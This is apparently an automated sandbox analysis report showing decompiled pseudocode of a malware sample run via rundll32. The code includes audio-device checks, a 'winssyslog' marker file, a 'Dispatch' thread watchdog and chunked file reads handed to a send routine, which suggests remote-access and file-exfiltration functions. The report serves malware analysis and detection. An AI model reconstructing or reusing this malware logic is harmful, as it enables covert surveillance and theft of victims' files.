                                                            					_t34 = L04648B90(_t28, "NtFreeVirtualMemory", _t33, _t34, _t36, _t26, _t33);
                                                            					_t38 = _t38 + 8;
                                                            					 *0x4687b20 = _t34;
                                                            					_t36 = _t33;
                                                            					 *0x4687b24 = _t36;
                                                            					if(_t34 != 0 || _t36 != 0) {
                                                            						goto L7;
                                                            					} else {
                                                            						L16:
                                                            						return 0;
                                                            					}
                                                            				}
                                                            			}




















                                                            0x04648d90
                                                            0x04648d98
                                                            0x04648d9e
                                                            0x04648da1
                                                            0x04648da7
                                                            0x04648dac
                                                            0x04648e00
                                                            0x04648e03
                                                            0x04648e09
                                                            0x04648e0b
                                                            0x04648e11
                                                            0x04648e16
                                                            0x04648e17
                                                            0x04648e18
                                                            0x04648e1c
                                                            0x04648e1f
                                                            0x04648e20
                                                            0x04648e25
                                                            0x04648e2c
                                                            0x04648e38
                                                            0x04648e3f
                                                            0x04648e4f
                                                            0x04648e56
                                                            0x04648e62
                                                            0x04648e73
                                                            0x04648e83
                                                            0x04648e8a
                                                            0x04648e8c
                                                            0x04648e91
                                                            0x04648e58
                                                            0x04648e58
                                                            0x04648e60
                                                            0x00000000
                                                            0x00000000
                                                            0x04648e60
                                                            0x04648e99
                                                            0x04648ea3
                                                            0x04648ea3
                                                            0x00000000
                                                            0x04648e45
                                                            0x04648e45
                                                            0x04648e4e
                                                            0x04648e4e
                                                            0x04648db2
                                                            0x04648db2
                                                            0x04648db7
                                                            0x04648dbf
                                                            0x04648dca
                                                            0x04648dcf
                                                            0x04648dcf
                                                            0x04648de1
                                                            0x04648de3
                                                            0x04648de6
                                                            0x04648dec
                                                            0x04648dee
                                                            0x04648df6
                                                            0x00000000
                                                            0x04648eab
                                                            0x04648eab
                                                            0x04648eb1
                                                            0x04648eb1
                                                            0x04648df6

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,00000000,00000000,0464BFF5,?,?,04649227), ref: 04648E67
                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04648E7B
                                                            • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04648E88
                                                            • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04648EA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                            • String ID: NtFreeVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                            • API String ID: 3496116238-2303597063
                                                            • Opcode ID: 0191b268ad32d15400ba3cd71f7df5d71e48b4cb9e6c0905e9df71838d324896
                                                            • Instruction ID: 2550df26b551b8443052fcc1c3b4305f28ee9cfb0b0d8d5e40a6f95f93b178c1
                                                            • Opcode Fuzzy Hash: 0191b268ad32d15400ba3cd71f7df5d71e48b4cb9e6c0905e9df71838d324896
                                                            • Instruction Fuzzy Hash: 6D319479A01215ABDB14EE55DC80A7BB7FAEBD8665F14512EED08D3300FB74AD008B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E04632000(intOrPtr* __ecx, intOrPtr _a4, char _a7) {
                                                            				void* _v12;
                                                            				char _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				void* __esi;
                                                            				intOrPtr _t18;
                                                            				intOrPtr _t23;
                                                            				intOrPtr _t29;
                                                            				intOrPtr* _t33;
                                                            				void* _t36;
                                                            
                                                            				_t18 = _a4;
                                                            				_t33 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t18;
                                                            				 *((intOrPtr*)(_t18 + 0x38)) = __ecx;
                                                            				 *(_t33 + 8) = CreateEventW(0, 1, 0, 0);
                                                            				 *_t33 = 0x467d858;
                                                            				if(waveInGetNumDevs() != 0) {
                                                            					_t47 =  *0x46878c8;
                                                            					if( *0x46878c8 == 0) {
                                                            						_t36 = L04655B14(CreateEventW, _t47, 0x5c);
                                                            						_t23 = E04631190(_t36, _t47);
                                                            						_push(_t36);
                                                            						_push(0x3f);
                                                            						 *((intOrPtr*)(_t33 + 0xc)) = _t23;
                                                            						_push(1);
                                                            						_push( &_a7);
                                                            						 *0x46878c8 = 1;
                                                            						_a7 = 0x7c;
                                                            						E04631C60( *((intOrPtr*)(_t33 + 4)));
                                                            						WaitForSingleObject( *(_t33 + 8), 0xffffffff);
                                                            						Sleep(0x96);
                                                            						_v24 = E04632220;
                                                            						_v20 = _t33;
                                                            						_v16 = 0;
                                                            						_v12 = CreateEventW(0, 0, 0, 0);
                                                            						_t29 = E0465F897( *((intOrPtr*)(_t33 + 4)), 0, 0, E04645400,  &_v24, 0, 0);
                                                            						WaitForSingleObject(_v12, 0xffffffff);
                                                            						CloseHandle(_v12);
                                                            						 *((intOrPtr*)(_t33 + 0x10)) = _t29;
                                                            					}
                                                            				}
                                                            				return _t33;
                                                            			}













                                                            0x04632003
                                                            0x04632011
                                                            0x04632019
                                                            0x0463201f
                                                            0x04632024
                                                            0x04632029
                                                            0x0463202c
                                                            0x0463203a
                                                            0x04632040
                                                            0x04632047
                                                            0x04632057
                                                            0x04632059
                                                            0x0463205e
                                                            0x04632062
                                                            0x04632064
                                                            0x0463206a
                                                            0x0463206c
                                                            0x0463206d
                                                            0x04632074
                                                            0x04632078
                                                            0x04632082
                                                            0x0463208d
                                                            0x0463209b
                                                            0x046320a2
                                                            0x046320a5
                                                            0x046320af
                                                            0x046320bf
                                                            0x046320ce
                                                            0x046320d7
                                                            0x046320dd
                                                            0x046320dd
                                                            0x04632047
                                                            0x046320e7

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04632027
                                                            • waveInGetNumDevs.WINMM ref: 04632032
                                                              • Part of subcall function 04631190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0463205E), ref: 046311A9
                                                              • Part of subcall function 04631190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0463205E), ref: 046311B6
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04632082
                                                            • Sleep.KERNEL32(00000096), ref: 0463208D
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 046320A9
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 046320CE
                                                            • CloseHandle.KERNEL32(?), ref: 046320D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleepwave
                                                            • String ID: |
                                                            • API String ID: 1906678132-2343686810
                                                            • Opcode ID: c24b75e7c444237e8e639251beadd78c0fa49d513cba3f671ba4605dd2de2338
                                                            • Instruction ID: 5b7b3722412fd388de8b91d548ee507aefce2c2bfbd7b4daec9c57dff4539563
                                                            • Opcode Fuzzy Hash: c24b75e7c444237e8e639251beadd78c0fa49d513cba3f671ba4605dd2de2338
                                                            • Instruction Fuzzy Hash: BA21D870A40304BFFB109F64DC89B597FA4EF04715F144159FA08AE2C1EBB5A940CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 81%
                                                            			E046399B0() {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				signed int _t9;
                                                            				signed int _t13;
                                                            				signed int _t14;
                                                            				void* _t16;
                                                            				void* _t20;
                                                            				void* _t22;
                                                            				void* _t23;
                                                            				void* _t26;
                                                            				void* _t27;
                                                            				void* _t28;
                                                            				signed int _t30;
                                                            
                                                            				_t9 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t9 ^ _t30;
                                                            				_push(_t22);
                                                            				_push(_t28);
                                                            				_push(_t26);
                                                            				_push(0);
                                                            				_t24 = L"winssyslog";
                                                            				E04646370(_t22, L"winssyslog",  &_v528, _t26, _t28, 8);
                                                            				_t13 = GetFileAttributesW( &_v528);
                                                            				_t27 = CloseHandle;
                                                            				_t23 = UnmapViewOfFile;
                                                            				_t14 = _t13 & 0xffffff00 | _t13 != 0xffffffff;
                                                            				 *0x46878c9 = _t14;
                                                            				L1:
                                                            				while(1) {
                                                            					if(_t14 != 0) {
                                                            						L4:
                                                            						E0463B600(_t23, _t24, _t27, _t36);
                                                            						_t14 =  *0x46878c9; // 0x0
                                                            						if(_t14 != 1) {
                                                            							L7:
                                                            							_t24 =  *0x4687adc; // 0x0
                                                            							if(_t24 != 0) {
                                                            								_t16 =  *(_t24 + 4);
                                                            								if(_t16 != 0) {
                                                            									TerminateThread(_t16, 0xffffffff);
                                                            									_t20 =  *0x4687adc; // 0x0
                                                            									CloseHandle( *(_t20 + 4));
                                                            									_t24 =  *0x4687adc; // 0x0
                                                            									 *(_t24 + 4) = 0;
                                                            								}
                                                            								UnmapViewOfFile(_t24);
                                                            								CloseHandle( *0x4687ad8);
                                                            								_t14 =  *0x46878c9; // 0x0
                                                            								 *0x4687adc = 0;
                                                            							}
                                                            							continue;
                                                            						}
                                                            						do {
                                                            							Sleep(0x64);
                                                            							_t14 =  *0x46878c9; // 0x0
                                                            						} while (_t14 == 1);
                                                            						goto L7;
                                                            					} else {
                                                            						do {
                                                            							Sleep(0x64);
                                                            							_t36 =  *0x46878c9;
                                                            						} while ( *0x46878c9 == 0);
                                                            						goto L4;
                                                            					}
                                                            				}
                                                            			}
















                                                            0x046399b9
                                                            0x046399c0
                                                            0x046399c3
                                                            0x046399c4
                                                            0x046399c5
                                                            0x046399c6
                                                            0x046399d0
                                                            0x046399d5
                                                            0x046399e4
                                                            0x046399f3
                                                            0x046399f9
                                                            0x046399ff
                                                            0x04639a02
                                                            0x00000000
                                                            0x04639a07
                                                            0x04639a09
                                                            0x04639a1d
                                                            0x04639a1d
                                                            0x04639a22
                                                            0x04639a29
                                                            0x04639a3d
                                                            0x04639a3d
                                                            0x04639a45
                                                            0x04639a47
                                                            0x04639a4c
                                                            0x04639a51
                                                            0x04639a57
                                                            0x04639a5f
                                                            0x04639a61
                                                            0x04639a67
                                                            0x04639a67
                                                            0x04639a6f
                                                            0x04639a77
                                                            0x04639a79
                                                            0x04639a7e
                                                            0x04639a7e
                                                            0x00000000
                                                            0x04639a45
                                                            0x04639a30
                                                            0x04639a32
                                                            0x04639a34
                                                            0x04639a39
                                                            0x00000000
                                                            0x04639a10
                                                            0x04639a10
                                                            0x04639a12
                                                            0x04639a14
                                                            0x04639a14
                                                            0x00000000
                                                            0x04639a10
                                                            0x04639a09

                                                            APIs
                                                              • Part of subcall function 04646370: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04646396
                                                            • GetFileAttributesW.KERNEL32(?), ref: 046399E4
                                                            • Sleep.KERNEL32(00000064), ref: 04639A12
                                                            • Sleep.KERNEL32(00000064), ref: 04639A32
                                                            • TerminateThread.KERNEL32(?,000000FF), ref: 04639A51
                                                            • CloseHandle.KERNEL32(?), ref: 04639A5F
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 04639A6F
                                                            • CloseHandle.KERNEL32 ref: 04639A77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileHandleSleep$AttributesDirectorySystemTerminateThreadUnmapView
                                                            • String ID: winssyslog
                                                            • API String ID: 3677296445-1874786851
                                                            • Opcode ID: 86c3e39392f8bb5b92a5a720b6952d118be49634de7ad22fa2f08c802bc69da5
                                                            • Instruction ID: 035f1c134ad19ee1d3870a4d22ca38137d5e5a09725f7c14fa5e70b20702ec48
                                                            • Opcode Fuzzy Hash: 86c3e39392f8bb5b92a5a720b6952d118be49634de7ad22fa2f08c802bc69da5
                                                            • Instruction Fuzzy Hash: 6E21E4B4600288EFD7149F65EC48B247FA5EB55316F64539CE45447382FB78AC05CF64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04637980(intOrPtr* __ecx) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				_Unknown_base(*)()* _t15;
                                                            				_Unknown_base(*)()* _t16;
                                                            				_Unknown_base(*)()* _t17;
                                                            				void* _t21;
                                                            				intOrPtr _t22;
                                                            				struct HINSTANCE__* _t24;
                                                            				intOrPtr* _t26;
                                                            				intOrPtr* _t27;
                                                            
                                                            				_t25 = __ecx;
                                                            				_t27 = __ecx;
                                                            				_t1 = _t27 + 0x10; // 0x10
                                                            				_t26 = _t1;
                                                            				 *_t26 = 0;
                                                            				 *__ecx = 0;
                                                            				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                                                            				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
                                                            				 *((short*)(__ecx + 0x18)) = 2;
                                                            				_t24 = LoadLibraryA("ntdll.dll");
                                                            				if(_t24 != 0) {
                                                            					_t15 = GetProcAddress(_t24, "RtlGetCompressionWorkSpaceSize");
                                                            					 *(_t27 + 4) = _t15;
                                                            					if(_t15 != 0) {
                                                            						_t16 = GetProcAddress(_t24, "RtlCompressBuffer");
                                                            						 *(_t27 + 8) = _t16;
                                                            						if(_t16 != 0) {
                                                            							_t17 = GetProcAddress(_t24, "RtlDecompressBuffer");
                                                            							 *(_t27 + 0xc) = _t17;
                                                            							if(_t17 != 0) {
                                                            								_t8 = _t27 + 0x14; // 0x14
                                                            								_t21 =  *( *(_t27 + 4))( *(_t27 + 0x18) & 0x0000ffff, _t26, _t8);
                                                            								_t35 = _t21;
                                                            								if(_t21 == 0) {
                                                            									_push( *_t26);
                                                            									_t22 = L04655B55(_t25, _t27, _t35);
                                                            									 *((intOrPtr*)(_t27 + 0x1c)) = _t22;
                                                            									if(_t22 != 0) {
                                                            										E0465DEA0(_t26, _t22, 0,  *_t26);
                                                            										 *_t27 = 1;
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t27;
                                                            			}













                                                            0x04637980
                                                            0x04637982
                                                            0x0463798a
                                                            0x0463798a
                                                            0x0463798d
                                                            0x04637998
                                                            0x0463799e
                                                            0x046379a5
                                                            0x046379ac
                                                            0x046379b6
                                                            0x046379ba
                                                            0x046379c2
                                                            0x046379c8
                                                            0x046379cd
                                                            0x046379d5
                                                            0x046379db
                                                            0x046379e0
                                                            0x046379e8
                                                            0x046379ee
                                                            0x046379f3
                                                            0x046379f5
                                                            0x04637a02
                                                            0x04637a04
                                                            0x04637a06
                                                            0x04637a08
                                                            0x04637a0a
                                                            0x04637a12
                                                            0x04637a17
                                                            0x04637a1e
                                                            0x04637a26
                                                            0x04637a26
                                                            0x04637a17
                                                            0x04637a06
                                                            0x046379f3
                                                            0x046379e0
                                                            0x046379cd
                                                            0x04637a31

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0464B836), ref: 046379B0
                                                            • GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 046379C2
                                                            • GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 046379D5
                                                            • GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 046379E8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: RtlCompressBuffer$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize$ntdll.dll
                                                            • API String ID: 2238633743-2202537490
                                                            • Opcode ID: 3823a45f19c1ab46d6fb494bf65a36b140e24873960b8fac524e478b38ff4668
                                                            • Instruction ID: 03f0f9ed8f5e8430035886176da5d824bfe7405ad2e20dcc84bce78068a932df
                                                            • Opcode Fuzzy Hash: 3823a45f19c1ab46d6fb494bf65a36b140e24873960b8fac524e478b38ff4668
                                                            • Instruction Fuzzy Hash: 4F113AB46007029BE7309F66EC49B43BBF8EF58702F004829E846D6651FBB6F5048B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0464C0A0() {
                                                            				long _t1;
                                                            				void* _t9;
                                                            				void* _t13;
                                                            				void* _t14;
                                                            
                                                            				_t9 = WaitForSingleObject;
                                                            				_t14 = Sleep;
                                                            				L1:
                                                            				_t10 = L"Dispatch";
                                                            				_t1 = E046494D0(_t9, L"Dispatch", _t13, _t14, _t15);
                                                            				_t15 = _t1;
                                                            				if(_t1 != 0) {
                                                            					__eflags = _t1 - 0x2fffffff;
                                                            					if(__eflags != 0) {
                                                            						_t13 = OpenThread(0x1fffff, 0, _t1);
                                                            						__eflags = _t13;
                                                            						if(__eflags != 0) {
                                                            							WaitForSingleObject(_t13, 0xffffffff);
                                                            							CloseHandle(_t13);
                                                            						}
                                                            						E0464C020(_t10, _t14, __eflags);
                                                            						Sleep(0x3e8);
                                                            					} else {
                                                            						Sleep(0x7d0);
                                                            						E046378B0(_t9, L"Dispatch", 0, _t13, _t14, __eflags);
                                                            						E0464C020(L"Dispatch", _t14, __eflags);
                                                            						Sleep(0x3e8);
                                                            					}
                                                            				} else {
                                                            					E0464C020(L"Dispatch", _t14, _t15);
                                                            					Sleep(0x3e8);
                                                            				}
                                                            				goto L1;
                                                            			}







                                                            0x0464c0a1
                                                            0x0464c0a8
                                                            0x0464c0b0
                                                            0x0464c0b0
                                                            0x0464c0b5
                                                            0x0464c0ba
                                                            0x0464c0bc
                                                            0x0464c0cc
                                                            0x0464c0d1
                                                            0x0464c102
                                                            0x0464c104
                                                            0x0464c106
                                                            0x0464c10b
                                                            0x0464c10e
                                                            0x0464c10e
                                                            0x0464c114
                                                            0x0464c11e
                                                            0x0464c0d3
                                                            0x0464c0d8
                                                            0x0464c0e1
                                                            0x0464c0e6
                                                            0x0464c0f0
                                                            0x0464c0f0
                                                            0x0464c0be
                                                            0x0464c0be
                                                            0x0464c0c8
                                                            0x0464c0c8
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 046494D0: wsprintfW.USER32 ref: 04649510
                                                              • Part of subcall function 046494D0: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 0464954D
                                                              • Part of subcall function 046494D0: RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,00000000,?), ref: 0464957C
                                                              • Part of subcall function 046494D0: RegCloseKey.ADVAPI32(?), ref: 04649592
                                                              • Part of subcall function 046494D0: wsprintfW.USER32 ref: 046495CB
                                                              • Part of subcall function 046494D0: OpenEventW.KERNEL32(001F0003,00000000,?), ref: 046495E2
                                                              • Part of subcall function 046494D0: CloseHandle.KERNEL32(00000000), ref: 046495ED
                                                            • Sleep.KERNEL32(000003E8), ref: 0464C0C8
                                                            • Sleep.KERNEL32(000007D0), ref: 0464C0D8
                                                            • Sleep.KERNEL32(000003E8), ref: 0464C0F0
                                                            • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 0464C0FC
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0464C10B
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464C10E
                                                            • Sleep.KERNEL32(000003E8), ref: 0464C11E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep$CloseOpen$Handlewsprintf$EventObjectQuerySingleThreadValueWait
                                                            • String ID: Dispatch
                                                            • API String ID: 3560866944-2137261068
                                                            • Opcode ID: a4d586556dc059ccfb901034b39b1ad38883188c2dd9ec1750bbe95af3f964d0
                                                            • Instruction ID: 80aa8190b55a979171f71e5a5936e97db9a4b42ef96b0201134e7f0689a5d3bf
                                                            • Opcode Fuzzy Hash: a4d586556dc059ccfb901034b39b1ad38883188c2dd9ec1750bbe95af3f964d0
                                                            • Instruction Fuzzy Hash: 53F0F071685210A6FB15B7B54C45F3D21298FC8F2CF120329F224A63C0FD917801057A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E046350B0(void* __ecx, LONG* _a4) {
                                                            				signed int _v8;
                                                            				long _v12;
                                                            				long _v16;
                                                            				struct _OVERLAPPED* _v20;
                                                            				long _v24;
                                                            				struct _OVERLAPPED* _v32;
                                                            				WCHAR* _t38;
                                                            				void* _t39;
                                                            				signed int _t41;
                                                            				signed int _t44;
                                                            				long _t45;
                                                            				long _t46;
                                                            				void* _t48;
                                                            				long _t55;
                                                            				signed int _t59;
                                                            				void* _t64;
                                                            				LONG* _t69;
                                                            				void* _t73;
                                                            				LONG* _t74;
                                                            				long _t76;
                                                            				void* _t77;
                                                            
                                                            				_t65 = __ecx;
                                                            				_t74 = _a4;
                                                            				_t73 = __ecx;
                                                            				_v20 = 0;
                                                            				if( *((intOrPtr*)(_t74 + 4)) == 0xffffffff) {
                                                            					L12:
                                                            					E04635220(_t65);
                                                            					__eflags = 0;
                                                            					return 0;
                                                            				} else {
                                                            					_t38 = __ecx + 0x18;
                                                            					if( *((intOrPtr*)(__ecx + 0x2c)) >= 8) {
                                                            						_t38 =  *_t38;
                                                            					}
                                                            					_t39 = CreateFileW(_t38, 0x80000000, 1, 0, 3, 0x80, 0);
                                                            					_t64 = _t39;
                                                            					if(_t64 != 0xffffffff) {
                                                            						_v12 = 0;
                                                            						_t41 = GetFileSize(_t64,  &_v12);
                                                            						_v24 =  *((intOrPtr*)(_t74 + 4));
                                                            						_v8 = 0;
                                                            						_v8 = _v8 | _t41;
                                                            						asm("sbb esi, edx");
                                                            						_t44 = _v8 -  *((intOrPtr*)(_t74 + 4)) + 9;
                                                            						__eflags = _t44;
                                                            						_v8 = _t44;
                                                            						asm("adc esi, 0x0");
                                                            						if(__eflags < 0) {
                                                            							L9:
                                                            							_t76 = _v8;
                                                            						} else {
                                                            							if(__eflags > 0) {
                                                            								L8:
                                                            								_t76 = 0x40000;
                                                            								_v32 = 0;
                                                            							} else {
                                                            								__eflags = _t44 - 0x40000;
                                                            								if(_t44 <= 0x40000) {
                                                            									goto L9;
                                                            								} else {
                                                            									goto L8;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t45 = SetFilePointer(_t64, _v24, _a4, 0);
                                                            						__eflags = _t45 - 0xffffffff;
                                                            						if(_t45 != 0xffffffff) {
                                                            							_t21 = _t76 - 9; // -9
                                                            							_t46 = _t21;
                                                            							_v24 = _t46;
                                                            							__eflags = _t46;
                                                            							if(_t46 == 0) {
                                                            								goto L11;
                                                            							} else {
                                                            								_v16 = 0;
                                                            								_t48 = LocalAlloc(0x40, _t76);
                                                            								_t69 = _a4;
                                                            								_t77 = _t48;
                                                            								 *_t77 = 0x6b;
                                                            								 *(_t77 + 1) =  *_t69;
                                                            								 *(_t77 + 5) = _t69[1];
                                                            								_t30 = _t77 + 9; // 0x9
                                                            								ReadFile(_t64, _t30, _v24,  &_v16, 0);
                                                            								CloseHandle(_t64);
                                                            								_t55 = _v16;
                                                            								__eflags = _t55;
                                                            								if(_t55 == 0) {
                                                            									E04635220(_t73);
                                                            									LocalFree(_t77);
                                                            									return _v20;
                                                            								} else {
                                                            									_push(_t69);
                                                            									_t59 = _t55 + 9;
                                                            									__eflags = _t59;
                                                            									_push(0x4f);
                                                            									_push(_t59);
                                                            									_push(_t77);
                                                            									_v20 = E04631C60( *((intOrPtr*)(_t73 + 4)));
                                                            									LocalFree(_t77);
                                                            									return _v20;
                                                            								}
                                                            							}
                                                            						} else {
                                                            							L11:
                                                            							CloseHandle(_t64);
                                                            							_t65 = _t73;
                                                            							goto L12;
                                                            						}
                                                            					} else {
                                                            						return _t39;
                                                            					}
                                                            				}
                                                            			}
























                                                            0x046350b0
                                                            0x046350b8
                                                            0x046350bc
                                                            0x046350be
                                                            0x046350c9
                                                            0x0463517a
                                                            0x0463517a
                                                            0x0463517f
                                                            0x04635187
                                                            0x046350cf
                                                            0x046350d3
                                                            0x046350d6
                                                            0x046350d8
                                                            0x046350d8
                                                            0x046350ed
                                                            0x046350f3
                                                            0x046350f8
                                                            0x04635108
                                                            0x04635111
                                                            0x0463511c
                                                            0x04635127
                                                            0x0463512e
                                                            0x04635136
                                                            0x04635138
                                                            0x04635138
                                                            0x0463513b
                                                            0x0463513e
                                                            0x04635141
                                                            0x0463515a
                                                            0x0463515a
                                                            0x04635143
                                                            0x04635143
                                                            0x0463514c
                                                            0x0463514c
                                                            0x04635151
                                                            0x04635145
                                                            0x04635145
                                                            0x0463514a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463514a
                                                            0x04635143
                                                            0x04635166
                                                            0x0463516c
                                                            0x0463516f
                                                            0x0463518a
                                                            0x0463518a
                                                            0x0463518d
                                                            0x04635190
                                                            0x04635192
                                                            0x00000000
                                                            0x04635194
                                                            0x04635197
                                                            0x0463519e
                                                            0x046351a4
                                                            0x046351a7
                                                            0x046351ab
                                                            0x046351b0
                                                            0x046351b6
                                                            0x046351c0
                                                            0x046351c5
                                                            0x046351cc
                                                            0x046351d2
                                                            0x046351d5
                                                            0x046351d7
                                                            0x04635201
                                                            0x04635207
                                                            0x04635216
                                                            0x046351d9
                                                            0x046351d9
                                                            0x046351dd
                                                            0x046351dd
                                                            0x046351e0
                                                            0x046351e2
                                                            0x046351e3
                                                            0x046351ea
                                                            0x046351ed
                                                            0x046351fc
                                                            0x046351fc
                                                            0x046351d7
                                                            0x04635171
                                                            0x04635171
                                                            0x04635172
                                                            0x04635178
                                                            0x00000000
                                                            0x04635178
                                                            0x046350fa
                                                            0x04635102
                                                            0x04635102
                                                            0x046350f8

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 046350ED
                                                            • GetFileSize.KERNEL32(00000000,?), ref: 04635111
                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 04635166
                                                            • CloseHandle.KERNEL32(00000000), ref: 04635172
                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0463519E
                                                            • ReadFile.KERNEL32(00000000,00000009,?,00000000,00000000), ref: 046351C5
                                                            • CloseHandle.KERNEL32(00000000), ref: 046351CC
                                                            • LocalFree.KERNEL32(00000000,00000000,-00000009,0000004F), ref: 046351ED
                                                            • LocalFree.KERNEL32(00000000), ref: 04635207
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Local$CloseFreeHandle$AllocCreatePointerReadSize
                                                            • String ID:
                                                            • API String ID: 1193681933-0
                                                            • Opcode ID: f8c0ec3430a6b3614d1b806e51c0ce07f1b5daba46e78bc43281515e261f80a5
                                                            • Instruction ID: de0aee357e9a91b8f19a5b35d4727e92bd44cf92d601edbf956902b0d9485571
                                                            • Opcode Fuzzy Hash: f8c0ec3430a6b3614d1b806e51c0ce07f1b5daba46e78bc43281515e261f80a5
                                                            • Instruction Fuzzy Hash: FB418775A00205BFDB14DFA5DC44BAEB7B8EF08325F10466AE91AE7380E775AD00CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 80%
                                                            			E0464E540(intOrPtr* __ecx) {
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _t43;
                                                            				long _t44;
                                                            				void* _t50;
                                                            				long _t52;
                                                            				void* _t53;
                                                            				void* _t63;
                                                            				intOrPtr _t66;
                                                            				intOrPtr* _t71;
                                                            				struct _CRITICAL_SECTION* _t76;
                                                            				struct _CRITICAL_SECTION* _t78;
                                                            
                                                            				_push(__ecx);
                                                            				_t71 = __ecx;
                                                            				while( *((intOrPtr*)(_t71 + 0x180)) > 0) {
                                                            					_t2 = _t71 + 0x14c; // 0x14d
                                                            					_t76 = _t2;
                                                            					EnterCriticalSection(_t76);
                                                            					_t63 =  *(_t71 + 0x168);
                                                            					if(_t63 ==  *(_t71 + 0x16c)) {
